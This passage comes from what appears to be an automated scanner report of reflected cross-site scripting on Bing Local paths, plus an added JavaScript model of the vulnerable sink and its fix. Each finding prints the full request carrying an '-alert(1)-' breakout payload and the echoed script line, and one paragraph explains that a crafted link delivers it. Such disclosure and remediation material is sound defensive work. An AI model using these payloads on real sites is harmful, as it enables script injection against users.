e=or3,preallocation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/e9bd9'-alert(1)-'44a4f985b0&/undefined/js';</script>
...[SNIP]...

1.7. http://www.bing.com/local/aa461'-alert(&/undefined/js/LSV.js [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.bing.com
Path:   /local/aa461'-alert(&/undefined/js/LSV.js

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript expression which is not encapsulated in any quotation marks. The payload 3ca30(a)67f9e9f5af0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject JavaScript commands into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/aa461'-alert(3ca30(a)67f9e9f5af0&/undefined/js/LSV.js?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/aa461'-alert(&/
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: VE_LSV=cache=0; BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; RMS=F=OC; _FP=; _SS=SID=713CCBFE4D6548D4AE8F9347FCE50360; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: dedc4fa85fb14b69992479659eba3523
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001206
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:09:44 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/aa461'-alert(3ca30(a)67f9e9f5af0&/undefined/js
Content-Length: 17710


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
cation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/aa461'-alert(3ca30(a)67f9e9f5af0&/undefined/js';</script>
...[SNIP]...

1.8. http://www.bing.com/local/assetgeneration.handler/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/assetgeneration.handler/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac766'-alert(1)-'39ecd17fea0 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The reflected value is the request path that the application also uses as the path attribute of its VE_LSV cookie (compare the Set-Cookie header below); it is written into the inline script as window.CookiePath without JavaScript string escaping, so the apostrophe in the path closes the literal and the remainder of the segment runs as code. Because the payload travels in the path of a plain GET request, a crafted link is enough, provided the browser sends the apostrophe unencoded as the Chrome 9 client used here did. The findings that follow are the same sink reached through different path segments, which is why each shows the identical CookiePath line in its response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/ac766'-alert(1)-'39ecd17fea0/?key=details.aag.cat.cc.pjAttr.rat.ot.sum.sf.ri.da.fea.sc.pho.rvws.wr.cou.offer.ads.sho.rat.rat.rat.rat.rat.rat.rat.rat.rat.rat.rat.ads.&type=text%2fcss&mkt=en-us&cb%3d20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/details.aspx?lid=YN165x3137627&q=Restaurants&qt=yp&tid=de23686c9d194a6fb644dc125b68270e&FORM=LLSV
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: e0c3531d4ad64e308c89c74aaee5f9e1
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001202
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:38:20 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/ac766'-alert(1)-'39ecd17fea0
Set-Cookie: _FS=mkt=en-US; domain=.bing.com; path=/
Content-Length: 18198


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
e=or3,preallocation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/ac766'-alert(1)-'39ecd17fea0';</script>
...[SNIP]...
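The following is an added example, not code from the XSS.CX report or from Bing. It models the window.CookiePath sink from findings 1.7 and 1.8 with a constructed generator (the real ASP.NET template is not shown in the report), classifies where a scanner marker lands in the script the way the "Issue detail" paragraphs do, executes the rendered line in a stub scope to confirm the breakout, and shows a hardened generator that serialises the path as a safe string literal. All function names (renderCookiePathVulnerable, jsStringLiteral, jsContextAt, classifyReflection, runRendered) are hypothetical, and Node.js is assumed.

```javascript
'use strict';

// Constructed stand-in for the server-side template that emitted the
// `window.CookiePath = '...'` line in the responses above. It is not Bing's
// code; it only reproduces the sink: a request-derived path spliced into a
// single-quoted JavaScript string literal with no escaping.
function renderCookiePathVulnerable(path) {
  return "window.CookiePath = '" + path + "';";
}

// Hardened generator. JSON.stringify yields a well-formed JS string literal
// (quotes and backslashes escaped), so no path value can terminate it. The
// extra replacements cover what JSON leaves open when the literal sits inside
// an HTML <script> block: "</script>" must never appear verbatim, and
// U+2028/U+2029 are JavaScript line terminators that JSON permits raw.
function jsStringLiteral(value) {
  return JSON.stringify(String(value))
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function renderCookiePathHardened(path) {
  return 'window.CookiePath = ' + jsStringLiteral(path) + ';';
}

// Scans `script` up to `index` tracking quote state and reports the lexical
// context at that position: inside a single- or double-quoted string, or in
// bare expression code. Backslash escapes are honoured; comments, regex
// literals and template strings are not handled, since the responses above
// contain none before the sink.
function jsContextAt(script, index) {
  let quote = null;
  for (let i = 0; i < index; i++) {
    const c = script[i];
    if (quote) {
      if (c === '\\') { i++; continue; }   // skip the escaped character
      if (c === quote) quote = null;
    } else if (c === "'" || c === '"') {
      quote = c;
    }
  }
  if (quote === "'") return 'single-quoted string';
  if (quote === '"') return 'double-quoted string';
  return 'expression';
}

// Locates the scanner's random marker (the prefix in front of its payload) in
// a response script and classifies the reflection.
function classifyReflection(script, marker) {
  const at = script.indexOf(marker);
  if (at < 0) return { reflected: false, context: null };
  return { reflected: true, context: jsContextAt(script, at) };
}

// Executes one rendered line in a throwaway scope with a stub `window` and a
// counting `alert`, so the breakout can be confirmed without a browser.
function runRendered(line) {
  const win = {};
  let alerts = 0;
  try {
    new Function('window', 'alert', line)(win, () => { alerts += 1; });
  } catch (e) {
    return { alerts, cookiePath: win.CookiePath, error: e.name };
  }
  return { alerts, cookiePath: win.CookiePath, error: null };
}

// The two request paths from findings 1.8 and 1.7, copied from the report.
const PATH_1_8 = "/local/ac766'-alert(1)-'39ecd17fea0";
const PATH_1_7 = "/local/aa461'-alert(3ca30(a)67f9e9f5af0&/undefined/js";

if (typeof require !== 'undefined' && require.main === module) {
  for (const [label, path, marker] of [['1.8', PATH_1_8, 'ac766'], ['1.7', PATH_1_7, '3ca30']]) {
    const vuln = renderCookiePathVulnerable(path);
    const safe = renderCookiePathHardened(path);
    console.log(label, 'vulnerable:', classifyReflection(vuln, marker).context, runRendered(vuln));
    console.log(label, 'hardened:  ', classifyReflection(safe, marker).context, runRendered(safe));
  }
}
```

Running it reproduces both report outcomes: the 1.8 path lands inside the single-quoted literal, its apostrophe closes it and the stub alert fires once (CookiePath ends up as NaN from the subtraction), while the 1.7 path lands in expression context and fails to parse, since 3ca30 is not a valid token, which is the scanner's "no proof of concept" result. The hardened generator keeps both paths, and a literal </script>, inert and intact.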

1.9. http://www.bing.com/local/assets/img/sprites/amenities.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/assets/img/sprites/amenities.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 3b35b'-alert(1)-'4e1f1451794 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/assets3b35b'-alert(1)-'4e1f1451794/img/sprites/amenities.png?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/details.aspx?lid=YN165x3137627&q=Restaurants&qt=yp&tid=de23686c9d194a6fb644dc125b68270e&FORM=LLSV
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 5033cca2a9fd48968ff9e958ac1f5883
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001203
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:38:23 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/assets3b35b'-alert(1)-'4e1f1451794/img/sprites
Content-Length: 17672


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
preallocation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/assets3b35b'-alert(1)-'4e1f1451794/img/sprites';</script>
...[SNIP]...

1.10. http://www.bing.com/local/assets/img/sprites/amenities.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/assets/img/sprites/amenities.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 73f6d'-alert(1)-'d3c3a0bfc13 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/assets/img73f6d'-alert(1)-'d3c3a0bfc13/sprites/amenities.png?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/details.aspx?lid=YN165x3137627&q=Restaurants&qt=yp&tid=de23686c9d194a6fb644dc125b68270e&FORM=LLSV
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 07e27e9ee526487ca43ff8c3fd735cf7
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001209
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:38:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/assets/img73f6d'-alert(1)-'d3c3a0bfc13/sprites
Content-Length: 17682


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
llocation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/assets/img73f6d'-alert(1)-'d3c3a0bfc13/sprites';</script>
...[SNIP]...

1.11. http://www.bing.com/local/assets/img/sprites/amenities.png [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/assets/img/sprites/amenities.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload e3b0d'-alert(1)-'cf7be748382 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/assets/img/spritese3b0d'-alert(1)-'cf7be748382/amenities.png?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/details.aspx?lid=YN165x3137627&q=Restaurants&qt=yp&tid=de23686c9d194a6fb644dc125b68270e&FORM=LLSV
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: e605f62d070745d891e4c3f69f4ac3e3
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001208
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:38:36 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/assets/img/spritese3b0d'-alert(1)-'cf7be748382
Content-Length: 17677


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
n=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/assets/img/spritese3b0d'-alert(1)-'cf7be748382';</script>
...[SNIP]...

1.12. http://www.bing.com/local/assets/img/sprites/details.sprite.png [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/assets/img/sprites/details.sprite.png

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 27cc6'-alert(1)-'546f87c5d57 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/assets27cc6'-alert(1)-'546f87c5d57/img/sprites/details.sprite.png?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/details.aspx?lid=YN165x3137627&q=Restaurants&qt=yp&tid=de23686c9d194a6fb644dc125b68270e&FORM=LLSV
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 43bb880c901a4bd4a9f09461411e7fda
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001211
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:38:24 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/assets27cc6'-alert(1)-'546f87c5d57/img/sprites
Content-Length: 17702


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
preallocation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/assets27cc6'-alert(1)-'546f87c5d57/img/sprites';</script>
...[SNIP]...

1.13. http://www.bing.com/local/assets/img/sprites/details.sprite.png [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/assets/img/sprites/details.sprite.png

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4f45b'-alert(1)-'00f4f3f16c3 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/assets/img4f45b'-alert(1)-'00f4f3f16c3/sprites/details.sprite.png?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/details.aspx?lid=YN165x3137627&q=Restaurants&qt=yp&tid=de23686c9d194a6fb644dc125b68270e&FORM=LLSV
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 525f9a49053641148713c97ec87fb04d
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001209
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:38:30 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/assets/img4f45b'-alert(1)-'00f4f3f16c3/sprites
Content-Length: 17697


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
llocation=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/assets/img4f45b'-alert(1)-'00f4f3f16c3/sprites';</script>
...[SNIP]...

1.14. http://www.bing.com/local/assets/img/sprites/details.sprite.png [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/assets/img/sprites/details.sprite.png

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 25ca6'-alert(1)-'d25aca3728 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /local/assets/img/sprites25ca6'-alert(1)-'d25aca3728/details.sprite.png?cb=20110127.750 HTTP/1.1
Host: www.bing.com
Proxy-Connection: keep-alive
Referer: http://www.bing.com/local/details.aspx?lid=YN165x3137627&q=Restaurants&qt=yp&tid=de23686c9d194a6fb644dc125b68270e&FORM=LLSV
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.94 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: BID=ffc572715c9e41ceb3cc2addc64d9b81; CID=17126809155d4dbfbdca3109cc733662; CDate=2/11/2011 9:58:09 PM; VE_LSV=cache=0; SRCHUID=V=2&GUID=C7C2D182D7764FEEAD0D492DC278F125; SRCHUSR=AUTOREDIR=0&GEOVAR=&DOB=20110112; _UR=OMW=0; SRCHHPGUSR=NEWWND=0&ADLT=DEMOTE&NRSLT=10&NRSPH=2&SRCHLANG=&AS=1; SRCHD=MS=1636861&SM=1&D=1593447&AF=NOFORM; MUID=DC63BAA44C3843F38378B4BB213E0A6F; _FP=; _SS=SID=DAB111187030489BBE221BE209BD1A2D&hIm=691; RMS=F=OC; _HOP=

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
X-BM-TraceID: 48f08638c85a4e3fa500dc96cb6ac4da
SearchRequest: Microsoft.VirtualEarth.ServicesProxy.SearchServiceV2.SearchAdvancedRequest
SearchRequestState: Success
X-AspNet-Version: 2.0.50727
X-BM-Srv: BL2M001202
Vary: Accept-Encoding
Date: Fri, 11 Feb 2011 22:38:38 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: VE_LSV=cache=0; path=/local/assets/img/sprites25ca6'-alert(1)-'d25aca3728
Content-Length: 18014


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xmlns:web="http://schemas.li
...[SNIP]...
n=0';window.CosmosIP = '173.193.214.243';window.ScriptSubDomain = 'http://sc1.maps.live.com/localsearch';window.mode = 'local';window.FooterID = 'sb_foot';window.CookiePath = '/local/assets/img/sprites25ca6'-alert(1)-'d25aca3728';</script>
...[SNIP]...

1.15. http://www.bing.com/local/us/co/colorado%20springs/ [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.bing.com
Path:   /local/us/co/colorado%20springs/

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c0e7a'-alert(1)-'5e1b01ee50d was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

